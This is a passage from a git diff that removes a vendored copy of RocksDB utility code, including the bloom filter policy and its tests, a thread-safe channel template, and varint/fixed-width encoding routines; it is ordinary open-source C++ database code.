-    const uint32_t bitpos = b + (h % (cache_line_size * 8));
-    if (((data[bitpos / 8]) & (1 << (bitpos % 8))) == 0) {
-      return false;
-    }
-
-    h += delta;
-  }
-
-  return true;
-}
-
-// An implementation of filter policy
-class BloomFilterPolicy : public FilterPolicy {
- public:
-  explicit BloomFilterPolicy(int bits_per_key, bool use_block_based_builder)
-      : bits_per_key_(bits_per_key), hash_func_(BloomHash),
-        use_block_based_builder_(use_block_based_builder) {
-    initialize();
-  }
-
-  ~BloomFilterPolicy() {
-  }
-
-  virtual const char* Name() const override {
-    return "rocksdb.BuiltinBloomFilter";
-  }
-
-  virtual void CreateFilter(const Slice* keys, int n,
-                            std::string* dst) const override {
-    // Compute bloom filter size (in both bits and bytes)
-    size_t bits = n * bits_per_key_;
-
-    // For small n, we can see a very high false positive rate.  Fix it
-    // by enforcing a minimum bloom filter length.
-    if (bits < 64) bits = 64;
-
-    size_t bytes = (bits + 7) / 8;
-    bits = bytes * 8;
-
-    const size_t init_size = dst->size();
-    dst->resize(init_size + bytes, 0);
-    dst->push_back(static_cast<char>(num_probes_));  // Remember # of probes
-    char* array = &(*dst)[init_size];
-    for (size_t i = 0; i < (size_t)n; i++) {
-      // Use double-hashing to generate a sequence of hash values.
-      // See analysis in [Kirsch,Mitzenmacher 2006].
-      uint32_t h = hash_func_(keys[i]);
-      const uint32_t delta = (h >> 17) | (h << 15);  // Rotate right 17 bits
-      for (size_t j = 0; j < num_probes_; j++) {
-        const uint32_t bitpos = h % bits;
-        array[bitpos/8] |= (1 << (bitpos % 8));
-        h += delta;
-      }
-    }
-  }
-
-  virtual bool KeyMayMatch(const Slice& key,
-                           const Slice& bloom_filter) const override {
-    const size_t len = bloom_filter.size();
-    if (len < 2) return false;
-
-    const char* array = bloom_filter.data();
-    const size_t bits = (len - 1) * 8;
-
-    // Use the encoded k so that we can read filters generated by
-    // bloom filters created using different parameters.
-    const size_t k = array[len-1];
-    if (k > 30) {
-      // Reserved for potentially new encodings for short bloom filters.
-      // Consider it a match.
-      return true;
-    }
-
-    uint32_t h = hash_func_(key);
-    const uint32_t delta = (h >> 17) | (h << 15);  // Rotate right 17 bits
-    for (size_t j = 0; j < k; j++) {
-      const uint32_t bitpos = h % bits;
-      if ((array[bitpos/8] & (1 << (bitpos % 8))) == 0) return false;
-      h += delta;
-    }
-    return true;
-  }
-
-  virtual FilterBitsBuilder* GetFilterBitsBuilder() const override {
-    if (use_block_based_builder_) {
-      return nullptr;
-    }
-
-    return new FullFilterBitsBuilder(bits_per_key_, num_probes_);
-  }
-
-  virtual FilterBitsReader* GetFilterBitsReader(const Slice& contents)
-      const override {
-    return new FullFilterBitsReader(contents);
-  }
-
-  // If choose to use block based builder
-  bool UseBlockBasedBuilder() { return use_block_based_builder_; }
-
- private:
-  size_t bits_per_key_;
-  size_t num_probes_;
-  uint32_t (*hash_func_)(const Slice& key);
-
-  const bool use_block_based_builder_;
-
-  void initialize() {
-    // We intentionally round down to reduce probing cost a little bit
-    num_probes_ = static_cast<size_t>(bits_per_key_ * 0.69);  // 0.69 =~ ln(2)
-    if (num_probes_ < 1) num_probes_ = 1;
-    if (num_probes_ > 30) num_probes_ = 30;
-  }
-};
-
-}  // namespace
-
-const FilterPolicy* NewBloomFilterPolicy(int bits_per_key,
-                                         bool use_block_based_builder) {
-  return new BloomFilterPolicy(bits_per_key, use_block_based_builder);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/bloom_test.cc b/thirdparty/rocksdb/util/bloom_test.cc
deleted file mode 100644
index 9c32341..0000000
--- a/thirdparty/rocksdb/util/bloom_test.cc
+++ /dev/null
@@ -1,321 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run this test... Skipping...\n");
-  return 0;
-}
-#else
-
-#include <gflags/gflags.h>
-#include <vector>
-
-#include "rocksdb/filter_policy.h"
-#include "table/full_filter_bits_builder.h"
-#include "util/arena.h"
-#include "util/logging.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-using GFLAGS::ParseCommandLineFlags;
-
-DEFINE_int32(bits_per_key, 10, "");
-
-namespace rocksdb {
-
-static const int kVerbose = 1;
-
-static Slice Key(int i, char* buffer) {
-  std::string s;
-  PutFixed32(&s, static_cast<uint32_t>(i));
-  memcpy(buffer, s.c_str(), sizeof(i));
-  return Slice(buffer, sizeof(i));
-}
-
-static int NextLength(int length) {
-  if (length < 10) {
-    length += 1;
-  } else if (length < 100) {
-    length += 10;
-  } else if (length < 1000) {
-    length += 100;
-  } else {
-    length += 1000;
-  }
-  return length;
-}
-
-class BloomTest : public testing::Test {
- private:
-  const FilterPolicy* policy_;
-  std::string filter_;
-  std::vector<std::string> keys_;
-
- public:
-  BloomTest() : policy_(
-      NewBloomFilterPolicy(FLAGS_bits_per_key)) {}
-
-  ~BloomTest() {
-    delete policy_;
-  }
-
-  void Reset() {
-    keys_.clear();
-    filter_.clear();
-  }
-
-  void Add(const Slice& s) {
-    keys_.push_back(s.ToString());
-  }
-
-  void Build() {
-    std::vector<Slice> key_slices;
-    for (size_t i = 0; i < keys_.size(); i++) {
-      key_slices.push_back(Slice(keys_[i]));
-    }
-    filter_.clear();
-    policy_->CreateFilter(&key_slices[0], static_cast<int>(key_slices.size()),
-                          &filter_);
-    keys_.clear();
-    if (kVerbose >= 2) DumpFilter();
-  }
-
-  size_t FilterSize() const {
-    return filter_.size();
-  }
-
-  void DumpFilter() {
-    fprintf(stderr, "F(");
-    for (size_t i = 0; i+1 < filter_.size(); i++) {
-      const unsigned int c = static_cast<unsigned int>(filter_[i]);
-      for (int j = 0; j < 8; j++) {
-        fprintf(stderr, "%c", (c & (1 <<j)) ? '1' : '.');
-      }
-    }
-    fprintf(stderr, ")\n");
-  }
-
-  bool Matches(const Slice& s) {
-    if (!keys_.empty()) {
-      Build();
-    }
-    return policy_->KeyMayMatch(s, filter_);
-  }
-
-  double FalsePositiveRate() {
-    char buffer[sizeof(int)];
-    int result = 0;
-    for (int i = 0; i < 10000; i++) {
-      if (Matches(Key(i + 1000000000, buffer))) {
-        result++;
-      }
-    }
-    return result / 10000.0;
-  }
-};
-
-TEST_F(BloomTest, EmptyFilter) {
-  ASSERT_TRUE(! Matches("hello"));
-  ASSERT_TRUE(! Matches("world"));
-}
-
-TEST_F(BloomTest, Small) {
-  Add("hello");
-  Add("world");
-  ASSERT_TRUE(Matches("hello"));
-  ASSERT_TRUE(Matches("world"));
-  ASSERT_TRUE(! Matches("x"));
-  ASSERT_TRUE(! Matches("foo"));
-}
-
-TEST_F(BloomTest, VaryingLengths) {
-  char buffer[sizeof(int)];
-
-  // Count number of filters that significantly exceed the false positive rate
-  int mediocre_filters = 0;
-  int good_filters = 0;
-
-  for (int length = 1; length <= 10000; length = NextLength(length)) {
-    Reset();
-    for (int i = 0; i < length; i++) {
-      Add(Key(i, buffer));
-    }
-    Build();
-
-    ASSERT_LE(FilterSize(), (size_t)((length * 10 / 8) + 40)) << length;
-
-    // All added keys must match
-    for (int i = 0; i < length; i++) {
-      ASSERT_TRUE(Matches(Key(i, buffer)))
-          << "Length " << length << "; key " << i;
-    }
-
-    // Check false positive rate
-    double rate = FalsePositiveRate();
-    if (kVerbose >= 1) {
-      fprintf(stderr, "False positives: %5.2f%% @ length = %6d ; bytes = %6d\n",
-              rate*100.0, length, static_cast<int>(FilterSize()));
-    }
-    ASSERT_LE(rate, 0.02);   // Must not be over 2%
-    if (rate > 0.0125) mediocre_filters++;  // Allowed, but not too often
-    else good_filters++;
-  }
-  if (kVerbose >= 1) {
-    fprintf(stderr, "Filters: %d good, %d mediocre\n",
-            good_filters, mediocre_filters);
-  }
-  ASSERT_LE(mediocre_filters, good_filters/5);
-}
-
-// Different bits-per-byte
-
-class FullBloomTest : public testing::Test {
- private:
-  const FilterPolicy* policy_;
-  std::unique_ptr<FilterBitsBuilder> bits_builder_;
-  std::unique_ptr<FilterBitsReader> bits_reader_;
-  std::unique_ptr<const char[]> buf_;
-  size_t filter_size_;
-
- public:
-  FullBloomTest() :
-      policy_(NewBloomFilterPolicy(FLAGS_bits_per_key, false)),
-      filter_size_(0) {
-    Reset();
-  }
-
-  ~FullBloomTest() {
-    delete policy_;
-  }
-
-  FullFilterBitsBuilder* GetFullFilterBitsBuilder() {
-    return dynamic_cast<FullFilterBitsBuilder*>(bits_builder_.get());
-  }
-
-  void Reset() {
-    bits_builder_.reset(policy_->GetFilterBitsBuilder());
-    bits_reader_.reset(nullptr);
-    buf_.reset(nullptr);
-    filter_size_ = 0;
-  }
-
-  void Add(const Slice& s) {
-    bits_builder_->AddKey(s);
-  }
-
-  void Build() {
-    Slice filter = bits_builder_->Finish(&buf_);
-    bits_reader_.reset(policy_->GetFilterBitsReader(filter));
-    filter_size_ = filter.size();
-  }
-
-  size_t FilterSize() const {
-    return filter_size_;
-  }
-
-  bool Matches(const Slice& s) {
-    if (bits_reader_ == nullptr) {
-      Build();
-    }
-    return bits_reader_->MayMatch(s);
-  }
-
-  double FalsePositiveRate() {
-    char buffer[sizeof(int)];
-    int result = 0;
-    for (int i = 0; i < 10000; i++) {
-      if (Matches(Key(i + 1000000000, buffer))) {
-        result++;
-      }
-    }
-    return result / 10000.0;
-  }
-};
-
-TEST_F(FullBloomTest, FilterSize) {
-  uint32_t dont_care1, dont_care2;
-  auto full_bits_builder = GetFullFilterBitsBuilder();
-  for (int n = 1; n < 100; n++) {
-    auto space = full_bits_builder->CalculateSpace(n, &dont_care1, &dont_care2);
-    auto n2 = full_bits_builder->CalculateNumEntry(space);
-    ASSERT_GE(n2, n);
-    auto space2 =
-        full_bits_builder->CalculateSpace(n2, &dont_care1, &dont_care2);
-    ASSERT_EQ(space, space2);
-  }
-}
-
-TEST_F(FullBloomTest, FullEmptyFilter) {
-  // Empty filter is not match, at this level
-  ASSERT_TRUE(!Matches("hello"));
-  ASSERT_TRUE(!Matches("world"));
-}
-
-TEST_F(FullBloomTest, FullSmall) {
-  Add("hello");
-  Add("world");
-  ASSERT_TRUE(Matches("hello"));
-  ASSERT_TRUE(Matches("world"));
-  ASSERT_TRUE(!Matches("x"));
-  ASSERT_TRUE(!Matches("foo"));
-}
-
-TEST_F(FullBloomTest, FullVaryingLengths) {
-  char buffer[sizeof(int)];
-
-  // Count number of filters that significantly exceed the false positive rate
-  int mediocre_filters = 0;
-  int good_filters = 0;
-
-  for (int length = 1; length <= 10000; length = NextLength(length)) {
-    Reset();
-    for (int i = 0; i < length; i++) {
-      Add(Key(i, buffer));
-    }
-    Build();
-
-    ASSERT_LE(FilterSize(), (size_t)((length * 10 / 8) + 128 + 5)) << length;
-
-    // All added keys must match
-    for (int i = 0; i < length; i++) {
-      ASSERT_TRUE(Matches(Key(i, buffer)))
-          << "Length " << length << "; key " << i;
-    }
-
-    // Check false positive rate
-    double rate = FalsePositiveRate();
-    if (kVerbose >= 1) {
-      fprintf(stderr, "False positives: %5.2f%% @ length = %6d ; bytes = %6d\n",
-              rate*100.0, length, static_cast<int>(FilterSize()));
-    }
-    ASSERT_LE(rate, 0.02);   // Must not be over 2%
-    if (rate > 0.0125)
-      mediocre_filters++;  // Allowed, but not too often
-    else
-      good_filters++;
-  }
-  if (kVerbose >= 1) {
-    fprintf(stderr, "Filters: %d good, %d mediocre\n",
-            good_filters, mediocre_filters);
-  }
-  ASSERT_LE(mediocre_filters, good_filters/5);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  ParseCommandLineFlags(&argc, &argv, true);
-
-  return RUN_ALL_TESTS();
-}
-
-#endif  // GFLAGS
diff --git a/thirdparty/rocksdb/util/build_version.cc.in b/thirdparty/rocksdb/util/build_version.cc.in
deleted file mode 100644
index d2e8c57..0000000
--- a/thirdparty/rocksdb/util/build_version.cc.in
+++ /dev/null
@@ -1,4 +0,0 @@
-#include "build_version.h"
-const char* rocksdb_build_git_sha = "rocksdb_build_git_sha:@@GIT_SHA@@";
-const char* rocksdb_build_git_date = "rocksdb_build_git_date:@@GIT_DATE_TIME@@";
-const char* rocksdb_build_compile_date = __DATE__;
diff --git a/thirdparty/rocksdb/util/build_version.h b/thirdparty/rocksdb/util/build_version.h
deleted file mode 100644
index 36ff92c..0000000
--- a/thirdparty/rocksdb/util/build_version.h
+++ /dev/null
@@ -1,15 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#if !defined(IOS_CROSS_COMPILE)
-// if we compile with Xcode, we don't run build_detect_version, so we don't
-// generate these variables
-// this variable tells us about the git revision
-extern const char* rocksdb_build_git_sha;
-
-// Date on which the code was compiled:
-extern const char* rocksdb_build_compile_date;
-#endif
diff --git a/thirdparty/rocksdb/util/cast_util.h b/thirdparty/rocksdb/util/cast_util.h
deleted file mode 100644
index 2dc8138..0000000
--- a/thirdparty/rocksdb/util/cast_util.h
+++ /dev/null
@@ -1,21 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-namespace rocksdb {
-// The helper function to assert the move from dynamic_cast<> to
-// static_cast<> is correct. This function is to deal with legacy code.
-// It is not recommanded to add new code to issue class casting. The preferred
-// solution is to implement the functionality without a need of casting.
-template <class DestClass, class SrcClass>
-inline DestClass* static_cast_with_check(SrcClass* x) {
-  DestClass* ret = static_cast<DestClass*>(x);
-#ifdef ROCKSDB_USE_RTTI
-  assert(ret == dynamic_cast<DestClass*>(x));
-#endif
-  return ret;
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/channel.h b/thirdparty/rocksdb/util/channel.h
deleted file mode 100644
index 1b03019..0000000
--- a/thirdparty/rocksdb/util/channel.h
+++ /dev/null
@@ -1,67 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <condition_variable>
-#include <mutex>
-#include <queue>
-#include <utility>
-
-#pragma once
-
-namespace rocksdb {
-
-template <class T>
-class channel {
- public:
-  explicit channel() : eof_(false) {}
-
-  channel(const channel&) = delete;
-  void operator=(const channel&) = delete;
-
-  void sendEof() {
-    std::lock_guard<std::mutex> lk(lock_);
-    eof_ = true;
-    cv_.notify_all();
-  }
-
-  bool eof() {
-    std::lock_guard<std::mutex> lk(lock_);
-    return buffer_.empty() && eof_;
-  }
-
-  size_t size() const {
-    std::lock_guard<std::mutex> lk(lock_);
-    return buffer_.size();
-  }
-
-  // writes elem to the queue
-  void write(T&& elem) {
-    std::unique_lock<std::mutex> lk(lock_);
-    buffer_.emplace(std::forward<T>(elem));
-    cv_.notify_one();
-  }
-
-  /// Moves a dequeued element onto elem, blocking until an element
-  /// is available.
-  // returns false if EOF
-  bool read(T& elem) {
-    std::unique_lock<std::mutex> lk(lock_);
-    cv_.wait(lk, [&] { return eof_ || !buffer_.empty(); });
-    if (eof_ && buffer_.empty()) {
-      return false;
-    }
-    elem = std::move(buffer_.front());
-    buffer_.pop();
-    cv_.notify_one();
-    return true;
-  }
-
- private:
-  std::condition_variable cv_;
-  std::mutex lock_;
-  std::queue<T> buffer_;
-  bool eof_;
-};
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/coding.cc b/thirdparty/rocksdb/util/coding.cc
deleted file mode 100644
index 3b58e3f..0000000
--- a/thirdparty/rocksdb/util/coding.cc
+++ /dev/null
@@ -1,81 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/coding.h"
-
-#include <algorithm>
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-
-namespace rocksdb {
-
-char* EncodeVarint32(char* dst, uint32_t v) {
-  // Operate on characters as unsigneds
-  unsigned char* ptr = reinterpret_cast<unsigned char*>(dst);
-  static const int B = 128;
-  if (v < (1 << 7)) {
-    *(ptr++) = v;
-  } else if (v < (1 << 14)) {
-    *(ptr++) = v | B;
-    *(ptr++) = v >> 7;
-  } else if (v < (1 << 21)) {
-    *(ptr++) = v | B;
-    *(ptr++) = (v >> 7) | B;
-    *(ptr++) = v >> 14;
-  } else if (v < (1 << 28)) {
-    *(ptr++) = v | B;
-    *(ptr++) = (v >> 7) | B;
-    *(ptr++) = (v >> 14) | B;
-    *(ptr++) = v >> 21;
-  } else {
-    *(ptr++) = v | B;
-    *(ptr++) = (v >> 7) | B;
-    *(ptr++) = (v >> 14) | B;
-    *(ptr++) = (v >> 21) | B;
-    *(ptr++) = v >> 28;
-  }
-  return reinterpret_cast<char*>(ptr);
-}
-
-const char* GetVarint32PtrFallback(const char* p, const char* limit,
-                                   uint32_t* value) {
-  uint32_t result = 0;
-  for (uint32_t shift = 0; shift <= 28 && p < limit; shift += 7) {
-    uint32_t byte = *(reinterpret_cast<const unsigned char*>(p));
-    p++;
-    if (byte & 128) {
-      // More bytes are present
-      result |= ((byte & 127) << shift);
-    } else {
-      result |= (byte << shift);
-      *value = result;
-      return reinterpret_cast<const char*>(p);
-    }
-  }
-  return nullptr;
-}
-
-const char* GetVarint64Ptr(const char* p, const char* limit, uint64_t* value) {
-  uint64_t result = 0;
-  for (uint32_t shift = 0; shift <= 63 && p < limit; shift += 7) {
-    uint64_t byte = *(reinterpret_cast<const unsigned char*>(p));
-    p++;
-    if (byte & 128) {
-      // More bytes are present
-      result |= ((byte & 127) << shift);
-    } else {
-      result |= (byte << shift);
-      *value = result;
-      return reinterpret_cast<const char*>(p);
-    }
-  }
-  return nullptr;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/coding.h b/thirdparty/rocksdb/util/coding.h
deleted file mode 100644
index 5cf0094..0000000
--- a/thirdparty/rocksdb/util/coding.h
+++ /dev/null
@@ -1,388 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Endian-neutral encoding:
-// * Fixed-length numbers are encoded with least-significant byte first
-// * In addition we support variable length "varint" encoding
-// * Strings are encoded prefixed by their length in varint format
-
-#pragma once
-#include <algorithm>
-#include <stdint.h>
-#include <string.h>
-#include <string>
-
-#include "rocksdb/write_batch.h"
-#include "port/port.h"
-
-// Some processors does not allow unaligned access to memory
-#if defined(__sparc)
-  #define PLATFORM_UNALIGNED_ACCESS_NOT_ALLOWED
-#endif
-
-namespace rocksdb {
-
-// The maximum length of a varint in bytes for 64-bit.
-const unsigned int kMaxVarint64Length = 10;
-
-// Standard Put... routines append to a string
-extern void PutFixed32(std::string* dst, uint32_t value);
-extern void PutFixed64(std::string* dst, uint64_t value);
-extern void PutVarint32(std::string* dst, uint32_t value);
-extern void PutVarint32Varint32(std::string* dst, uint32_t value1,
-                                uint32_t value2);
-extern void PutVarint32Varint32Varint32(std::string* dst, uint32_t value1,
-                                        uint32_t value2, uint32_t value3);
-extern void PutVarint64(std::string* dst, uint64_t value);
-extern void PutVarint64Varint64(std::string* dst, uint64_t value1,
-                                uint64_t value2);
-extern void PutVarint32Varint64(std::string* dst, uint32_t value1,
-                                uint64_t value2);
-extern void PutVarint32Varint32Varint64(std::string* dst, uint32_t value1,
-                                        uint32_t value2, uint64_t value3);
-extern void PutLengthPrefixedSlice(std::string* dst, const Slice& value);
-extern void PutLengthPrefixedSliceParts(std::string* dst,
-                                        const SliceParts& slice_parts);
-
-// Standard Get... routines parse a value from the beginning of a Slice
-// and advance the slice past the parsed value.
-extern bool GetFixed64(Slice* input, uint64_t* value);
-extern bool GetFixed32(Slice* input, uint32_t* value);
-extern bool GetVarint32(Slice* input, uint32_t* value);
-extern bool GetVarint64(Slice* input, uint64_t* value);
-extern bool GetLengthPrefixedSlice(Slice* input, Slice* result);
-// This function assumes data is well-formed.
-extern Slice GetLengthPrefixedSlice(const char* data);
-
-extern Slice GetSliceUntil(Slice* slice, char delimiter);
-
-// Pointer-based variants of GetVarint...  These either store a value
-// in *v and return a pointer just past the parsed value, or return
-// nullptr on error.  These routines only look at bytes in the range
-// [p..limit-1]
-extern const char* GetVarint32Ptr(const char* p,const char* limit, uint32_t* v);
-extern const char* GetVarint64Ptr(const char* p,const char* limit, uint64_t* v);
-
-// Returns the length of the varint32 or varint64 encoding of "v"
-extern int VarintLength(uint64_t v);
-
-// Lower-level versions of Put... that write directly into a character buffer
-// REQUIRES: dst has enough space for the value being written
-extern void EncodeFixed32(char* dst, uint32_t value);
-extern void EncodeFixed64(char* dst, uint64_t value);
-
-// Lower-level versions of Put... that write directly into a character buffer
-// and return a pointer just past the last byte written.
-// REQUIRES: dst has enough space for the value being written
-extern char* EncodeVarint32(char* dst, uint32_t value);
-extern char* EncodeVarint64(char* dst, uint64_t value);
-
-// Lower-level versions of Get... that read directly from a character buffer
-// without any bounds checking.
-
-inline uint32_t DecodeFixed32(const char* ptr) {
-  if (port::kLittleEndian) {
-    // Load the raw bytes
-    uint32_t result;
-    memcpy(&result, ptr, sizeof(result));  // gcc optimizes this to a plain load
-    return result;
-  } else {
-    return ((static_cast<uint32_t>(static_cast<unsigned char>(ptr[0])))
-        | (static_cast<uint32_t>(static_cast<unsigned char>(ptr[1])) << 8)
-        | (static_cast<uint32_t>(static_cast<unsigned char>(ptr[2])) << 16)
-        | (static_cast<uint32_t>(static_cast<unsigned char>(ptr[3])) << 24));
-  }
-}
-
-inline uint64_t DecodeFixed64(const char* ptr) {
-  if (port::kLittleEndian) {
-    // Load the raw bytes
-    uint64_t result;
-    memcpy(&result, ptr, sizeof(result));  // gcc optimizes this to a plain load
-    return result;
-  } else {
-    uint64_t lo = DecodeFixed32(ptr);
-    uint64_t hi = DecodeFixed32(ptr + 4);
-    return (hi << 32) | lo;
-  }
-}
-
-// Internal routine for use by fallback path of GetVarint32Ptr
-extern const char* GetVarint32PtrFallback(const char* p,
-                                          const char* limit,
-                                          uint32_t* value);
-inline const char* GetVarint32Ptr(const char* p,
-                                  const char* limit,
-                                  uint32_t* value) {
-  if (p < limit) {
-    uint32_t result = *(reinterpret_cast<const unsigned char*>(p));
-    if ((result & 128) == 0) {
-      *value = result;
-      return p + 1;
-    }
-  }
-  return GetVarint32PtrFallback(p, limit, value);
-}
-
-// -- Implementation of the functions declared above
-inline void EncodeFixed32(char* buf, uint32_t value) {
-  if (port::kLittleEndian) {
-    memcpy(buf, &value, sizeof(value));
-  } else {
-    buf[0] = value & 0xff;
-    buf[1] = (value >> 8) & 0xff;
-    buf[2] = (value >> 16) & 0xff;
-    buf[3] = (value >> 24) & 0xff;
-  }
-}
-
-inline void EncodeFixed64(char* buf, uint64_t value) {
-  if (port::kLittleEndian) {
-    memcpy(buf, &value, sizeof(value));
-  } else {
-    buf[0] = value & 0xff;
-    buf[1] = (value >> 8) & 0xff;
-    buf[2] = (value >> 16) & 0xff;
-    buf[3] = (value >> 24) & 0xff;
-    buf[4] = (value >> 32) & 0xff;
-    buf[5] = (value >> 40) & 0xff;
-    buf[6] = (value >> 48) & 0xff;
-    buf[7] = (value >> 56) & 0xff;
-  }
-}
-
-// Pull the last 8 bits and cast it to a character
-inline void PutFixed32(std::string* dst, uint32_t value) {
-  if (port::kLittleEndian) {
-    dst->append(const_cast<const char*>(reinterpret_cast<char*>(&value)),
-      sizeof(value));
-  } else {
-    char buf[sizeof(value)];
-    EncodeFixed32(buf, value);
-    dst->append(buf, sizeof(buf));
-  }
-}
-
-inline void PutFixed64(std::string* dst, uint64_t value) {
-  if (port::kLittleEndian) {
-    dst->append(const_cast<const char*>(reinterpret_cast<char*>(&value)),
-      sizeof(value));
-  } else {
-    char buf[sizeof(value)];
-    EncodeFixed64(buf, value);
-    dst->append(buf, sizeof(buf));
-  }
-}
-
-inline void PutVarint32(std::string* dst, uint32_t v) {
-  char buf[5];
-  char* ptr = EncodeVarint32(buf, v);
-  dst->append(buf, static_cast<size_t>(ptr - buf));
-}
-
-inline void PutVarint32Varint32(std::string* dst, uint32_t v1, uint32_t v2) {
-  char buf[10];
-  char* ptr = EncodeVarint32(buf, v1);
-  ptr = EncodeVarint32(ptr, v2);
-  dst->append(buf, static_cast<size_t>(ptr - buf));
-}
-
-inline void PutVarint32Varint32Varint32(std::string* dst, uint32_t v1,
-                                        uint32_t v2, uint32_t v3) {
-  char buf[15];
-  char* ptr = EncodeVarint32(buf, v1);
-  ptr = EncodeVarint32(ptr, v2);
-  ptr = EncodeVarint32(ptr, v3);
-  dst->append(buf, static_cast<size_t>(ptr - buf));
-}
-
-inline char* EncodeVarint64(char* dst, uint64_t v) {
-  static const unsigned int B = 128;
-  unsigned char* ptr = reinterpret_cast<unsigned char*>(dst);
-  while (v >= B) {
-    *(ptr++) = (v & (B - 1)) | B;
-    v >>= 7;
-  }
-  *(ptr++) = static_cast<unsigned char>(v);
-  return reinterpret_cast<char*>(ptr);
-}
-
-inline void PutVarint64(std::string* dst, uint64_t v) {
-  char buf[10];
-  char* ptr = EncodeVarint64(buf, v);
-  dst->append(buf, static_cast<size_t>(ptr - buf));
-}
-
-inline void PutVarint64Varint64(std::string* dst, uint64_t v1, uint64_t v2) {
-  char buf[20];
-  char* ptr = EncodeVarint64(buf, v1);
-  ptr = EncodeVarint64(ptr, v2);
-  dst->append(buf, static_cast<size_t>(ptr - buf));
-}
-
-inline void PutVarint32Varint64(std::string* dst, uint32_t v1, uint64_t v2) {
-  char buf[15];
-  char* ptr = EncodeVarint32(buf, v1);
-  ptr = EncodeVarint64(ptr, v2);
-  dst->append(buf, static_cast<size_t>(ptr - buf));
-}
-
-inline void PutVarint32Varint32Varint64(std::string* dst, uint32_t v1,
-                                        uint32_t v2, uint64_t v3) {
-  char buf[20];
-  char* ptr = EncodeVarint32(buf, v1);
-  ptr = EncodeVarint32(ptr, v2);
-  ptr = EncodeVarint64(ptr, v3);
-  dst->append(buf, static_cast<size_t>(ptr - buf));
-}
-
-inline void PutLengthPrefixedSlice(std::string* dst, const Slice& value) {
-  PutVarint32(dst, static_cast<uint32_t>(value.size()));
-  dst->append(value.data(), value.size());
-}
-
-inline void PutLengthPrefixedSliceParts(std::string* dst,
-                                        const SliceParts& slice_parts) {
-  size_t total_bytes = 0;
-  for (int i = 0; i < slice_parts.num_parts; ++i) {
-    total_bytes += slice_parts.parts[i].size();
-  }
-  PutVarint32(dst, static_cast<uint32_t>(total_bytes));
-  for (int i = 0; i < slice_parts.num_parts; ++i) {
-    dst->append(slice_parts.parts[i].data(), slice_parts.parts[i].size());
-  }
-}
-
-inline int VarintLength(uint64_t v) {
-  int len = 1;
-  while (v >= 128) {
-    v >>= 7;
-    len++;
-  }
-  return len;
-}
-
-inline bool GetFixed64(Slice* input, uint64_t* value) {
-  if (input->size() < sizeof(uint64_t)) {
-    return false;
-  }
-  *value = DecodeFixed64(input->data());
-  input->remove_prefix(sizeof(uint64_t));
-  return true;
-}
-
-inline bool GetFixed32(Slice* input, uint32_t* value) {
-  if (input->size() < sizeof(uint32_t)) {
-    return false;
-  }
-  *value = DecodeFixed32(input->data());
-  input->remove_prefix(sizeof(uint32_t));
-  return true;
-}
-
-inline bool GetVarint32(Slice* input, uint32_t* value) {
-  const char* p = input->data();
-  const char* limit = p + input->size();
-  const char* q = GetVarint32Ptr(p, limit, value);
-  if (q == nullptr) {
-    return false;
-  } else {
-    *input = Slice(q, static_cast<size_t>(limit - q));
-    return true;
-  }
-}
-
-inline bool GetVarint64(Slice* input, uint64_t* value) {
-  const char* p = input->data();
-  const char* limit = p + input->size();
-  const char* q = GetVarint64Ptr(p, limit, value);
-  if (q == nullptr) {
-    return false;
-  } else {
-    *input = Slice(q, static_cast<size_t>(limit - q));
-    return true;
-  }
-}
-
-// Provide an interface for platform independent endianness transformation
-inline uint64_t EndianTransform(uint64_t input, size_t size) {
-  char* pos = reinterpret_cast<char*>(&input);
-  uint64_t ret_val = 0;
-  for (size_t i = 0; i < size; ++i) {
-    ret_val |= (static_cast<uint64_t>(static_cast<unsigned char>(pos[i]))
-                << ((size - i - 1) << 3));
-  }
-  return ret_val;
-}
-
-inline bool GetLengthPrefixedSlice(Slice* input, Slice* result) {
-  uint32_t len = 0;
-  if (GetVarint32(input, &len) && input->size() >= len) {
-    *result = Slice(input->data(), len);
-    input->remove_prefix(len);
-    return true;
-  } else {
-    return false;
-  }
-}
-
-inline Slice GetLengthPrefixedSlice(const char* data) {
-  uint32_t len = 0;
-  // +5: we assume "data" is not corrupted
